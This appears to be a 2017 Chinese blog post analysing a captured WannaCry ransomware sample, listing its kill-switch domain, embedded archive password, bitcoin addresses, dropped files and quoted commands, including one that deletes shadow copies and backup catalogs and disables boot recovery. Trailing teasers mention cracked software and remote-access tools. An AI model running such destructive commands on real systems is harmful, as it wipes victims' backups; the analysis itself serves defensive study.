当前位置:首页 > 业界动态 > 正文内容

WannaCry 病毒破解和分析-1

炫懿3年前 (2017-05-14)业界动态2589

WannaCry 病毒破解和分析-1 业界动态 第1张

看到最近闹的沸沸扬扬的校园网加密勒索病毒,我也好奇了。

有幸今天同学冒着种种危险抓到了一只活的以供研究。

下面谈谈如何“解剖”这个病毒以及发现了什么有趣的东西。


 样本启动后会首先请求如下域名: 
ht和谐tp://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 
请求失败后,才会执行加密;否则,则放弃进一步加密,并直接退出。
该域名在病毒爆发初期便已被安全部门接管。
所以鉴于该勒索软件需要连通上述秘密开关域名,才会停止加密。因此,如果内网机器没有外网访问权限,则建议客户在内网修改此开关域名的内网解析,并且将解析 IP 指向在线的内部 web 服务器;如果内网机器具有外网访问权限,则无须采取额外措施。

WNCRY 勒索蠕虫可进行部分文件恢复程序: 查看链接» 或余弦微博上所发的 foremost 。


首先我在windows下面安装了沙盒Sandboxie,并在其中做操作。沙盒能够将病毒和外界隔离,避免破坏我的系统(这个病毒目前看来没有反沙盒能力)。虽然我也不算新手应该不会失手,所以没有在虚拟机里面折腾病毒,但是毕竟裸奔不太好,就用了沙盒。

WannaCry 病毒破解和分析-1 业界动态 第2张

按照套路,我先用 ResourceHacker 分析了病毒的资源文件,其中一个很大的且内容以“PK”开头的部分引起了我的注意。按照经验这是个压缩包。导出文件后发现它竟然和源程序差不多大,那应该稳了,应该是病毒主体。

WannaCry 病毒破解和分析-1 业界动态 第3张

然后我试图解压,不出所料需要密码。于是我回到*nix下用strings导出了程序中所有的字符串。简单分析后可以发现其中有非常引人注目的一些字符串,应该是程序的字串表。里面的内容非常有意思:

// 这几个是病毒使用的加密服务。病毒用的是业界标准和公认安全的加密,基本无法破解。
Microsoft Enhanced RSA and AES Cryptographic Provider
CryptGenKey
CryptDecrypt
CryptEncrypt
CryptDestroyKey
CryptImportKey
CryptAcquireContextA
// 病毒执行的命令
cmd.exe /c "%s"
// 似乎是比特币?
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
// 病毒的互斥量,注册计划任务等等
%s%d
Global\MsWinZonesCacheCounterMutexA
tasksche.exe
TaskStart
t.wnry
// 病毒解除当前目录和子文件夹所有权限限制
icacls . /grant Everyone:F /T /C /Q
// 病毒隐藏当前文件夹
attrib +h .
// 哈哈,这个不是密码是啥

WNcry@2ol7

WannaCry 病毒破解和分析-1 业界动态 第4张

输入密码解压后,有以下文件和文件夹:

msg\ // 一个目录,里面放了28种语言的解释说明。推测使用word写的,转为RTF格式保存。我看了英文和中文的,排版整齐,翻译质量极高,并且中文水平明略高于英文,而且更加有恶意。怀疑病毒作者要不是中国人,要不对中国有恶意。

WannaCry 病毒破解和分析-1 业界动态 第5张

WannaCry 病毒破解和分析-1 业界动态 第6张

WannaCry 病毒破解和分析-1 业界动态 第7张

WannaCry 病毒破解和分析-1 业界动态 第8张

WannaCry 病毒破解和分析-1 业界动态 第9张

b.wnry // 病毒中的图片
c.wnry // 里面一堆.onion字样的内容,推测是Tor使用的配置。里面还有Tor浏览器的下载链接。
r.wnry // 对话框内容
s.wnry // 一份完整的Tor程序的压缩包
t.wnry // 目前用途不明
taskdl.exe // 某种简单程序,目前用途不明,看上去完全用C++的库写的程序
taskse.exe // 某种简单程序,目前用途不明,但因为其中使用wtsapi32.dll,可能和远程桌面控制有关
u.wnry // 释放的主程序,还没有仔细分析。但是其中含有的一个命令(整理之后)让人注目:

cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

WannaCry 病毒破解和分析-1 业界动态 第10张

这个命令用于关闭和删除用户所有的备份服务,并阻止启动恢复,而且阻止显示这些操作造成的系统错误。所以恢复和本地备份很可能是无效的。

关于Tor要说几句。Tor(The Onion Router,洋葱路由器)是实现匿名通信的自由软件。Tor是第二代洋葱路由的一种实现,用户通过Tor可以在因特网上进行匿名交流。最初该项目由美国海军研究实验室赞助。2004年后期,Tor成为电子前哨基金会(EFF)的一个项目。2005年后期,EFF不再赞助Tor项目,但他们继续维持Tor的官方网站。Tor用于防范互联网上广泛存在的流量过滤、嗅探分析。Tor在由“洋葱路由”组成的表层网(overlay network)上进行通信,可以实现匿名对外连接、匿名隐藏服务。

总之通过Tor,黑客可以匿名的远程控制病毒的行为。

而其中的比特币是一种去中心化的(不受任何银行和机构支配,以安全协议和数学证明维护诚信)匿名的电子货币,可以实现匿名支付以避免暴露身份。

先到这里。

相关文章

又一名“黑客”猝死了,就像现实版的黑客悲情

又一名“黑客”猝死了,就像现实版的黑客悲情

  玩过远控的人应该都知道,大灰狼这款远控软件,这款远控软件应该可以算是集葛军的灰鸽子和红狼的gh0st之后又一款国产远控软件的经典作品,虽然大灰狼在一定程度上有抄袭gh0st的源码,但是其内核绝对是优于gh0st的,只不过网上流出来的很多大灰狼版本都是各种渣渣修改过的,把本来很稳定的大灰狼改版成了“渣”,而且还加了后门。大家都知道葛军和红狼,但是却很少有人知道“大灰狼远控”的...

[Windows]U盘杀毒软件 (USBKiller) -注册机爆破密钥-破解版

[Windows]U盘杀毒软件 (USBKiller) -注册机爆破密钥-破解版

—高效查杀: 完全查杀文件夹病毒、autorun.inf、vbs病毒、exe病毒等千种U盘病毒;—U盘 免疫: 自动检测并清除插入U盘内的病毒,防止病毒通过U盘感染电脑;—自动恢复: 杀完病毒后能自动修复U盘隐藏文件,以及恢复系统设置;—解锁 U盘: 解除U盘锁定状态,解决拔出时“无法停止设备”的问题;—进程管理: 让你迅速辨别并终止系统中的可疑程序;—支持设备: 支持移动硬盘、手机内存卡、MP3...

最新果歪代理IP轻松获取过万工具

最新果歪代理IP轻松获取过万工具

挺好用的一款代理IP获取软件,有的朋友肯定会喜欢的,轻轻松松IP过万。最新果歪代理IP轻松获取过万工具.rar密码:hsk3|大小:313K已经过安全软件检测无毒,请您放心下载。...

百度这么多年,挺不容易的!

百度这么多年,挺不容易的!

  作为全球最大的中文搜索引擎,百度给我们的生活确实带来了很大的便利,也让我们国家真正拥有了自己的搜索引擎,保护了国家的隐私。  但是百度市值突然下滑,论坛里就出现了“树倒猢狲散”的现象,很多人骂百度,抱怨百度不给流量。我之前也有这种想法,但是当我今天搜索了一个关键词,发现了很有趣的现象。  我搜索了癫痫病,百度的“框计算”。直接把癫痫病这个词,给了百度的百科医典。W...

禁用WebRTC防止真实IP泄漏

禁用WebRTC防止真实IP泄漏

  一般用户使用代理服务器,很多时候是不希望暴露自己的真实IP地址,但最近暴露出一个WebRTC一个特性,会暴露我们的真实IP,对于大多数浏览器例如Chrome、Firefox等都存在这种问题。  什么是WebRTC  WebRTC(Web Real-Time Communication)是一个支持网页浏览器进行实时语音对话或视频对话的技术,是谷歌2010年以6820万美元收购Global IP...

我为什么不喜欢微信

我为什么不喜欢微信

这个问题是我在知乎的一个回答,原始问题是“什么样的用户不喜欢微信”?出于数据备份的原因,将其复制保留一份到这里,以防丢失。以下是原回答内容:  我是做技术出身的,我非常不喜欢微信,同样也不喜欢QQ,但是为了联系朋友又不得不用。  不喜欢微信的原因很简单,因为在微信上面,我的数据不属于我。  好友聊天数据  腾讯微信官方一直不提供导出聊天记录到CSV或TXT文件的功能,也不提供聊天记录备份的功能,用...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
召唤伊斯特瓦尔